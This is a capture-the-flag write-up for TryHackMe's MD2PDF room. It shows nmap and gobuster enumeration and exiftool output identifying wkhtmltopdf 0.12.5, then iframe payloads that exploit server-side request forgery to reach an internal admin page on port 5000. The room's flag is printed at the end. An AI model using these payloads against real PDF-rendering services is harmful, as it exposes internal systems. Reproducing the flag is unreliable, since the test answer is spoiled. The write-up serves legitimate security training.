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MD2PDF TryHackMe

Difficulty = Easy

Description: Hello Hacker! TopTierConversions LTD is proud to announce its latest and greatest product launch: MD2PDF. This easy-to-use utility converts markdown files to PDF and is totally secure! Right…?

Nmap Scan:

└─$ nmap -sCV -p22,80,5000 -Pn
Starting Nmap 7.92 ( ) at 2023-02-11 01:23 WAT
Nmap scan report for
Host is up.

22/tcp   filtered ssh
80/tcp   filtered http
5000/tcp filtered upnp

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 3.75 seconds

Checking the web server on port 80 shows that it converts markdown file to pdf image

So if i include things markdown uses it will be converted to pdf image image

Now i’ll download the generated pdf file to check out the metadata

└─$ file document.pdf                       
document.pdf: PDF document, version 1.4, 0 pages
└─$ exiftool document.pdf
ExifTool Version Number         : 12.44
File Name                       : document.pdf
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2023:02:11 01:25:32+01:00
File Access Date/Time           : 2023:02:11 01:25:33+01:00
File Inode Change Date/Time     : 2023:02:11 01:25:32+01:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Title                           : 
Creator                         : wkhtmltopdf 0.12.5
Producer                        : Qt 4.8.7
Create Date                     : 2023:02:11 00:19:54Z
Page Count                      : 1
Page Mode                       : UseOutlines

Ok so we see the creator name wkhtmltopdf 0.12.5 I’ll search google to know if there’s publicly known exploit it image image

Reading about the exploit shows that we can use iframe tag and perform Server Side Request Forgery

Payload: <iframe src="http://localhost/" width="1000" height="2000">`

But using that payload is not what we want cause we need the flag not the web page of the web server running on port 80

Now i’ll run gobuster to see if there’s any interesting thing

└─$ gobuster dir -u -w /usr/share/wordlists/dirb/common.txt 
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
2023/02/11 01:05:06 Starting gobuster in directory enumeration mode
/admin                (Status: 403) [Size: 166]
Progress: 4612 / 4615 (100.00%)
2023/02/11 01:07:12 Finished

There’s an admin directory which when accessed gives 403 image

Cool so now what we can do is to leverage the SSRF vulnerability and view the admin directory on port 5000 image

Payload: <iframe src="http://localhost:5000/admin" width="1000" height="2000">`

On submitting the payload we get the flag xD image

Flag: flag{1f4a2b6ffeaf4707c43885d704eaee4b}

And we’re done

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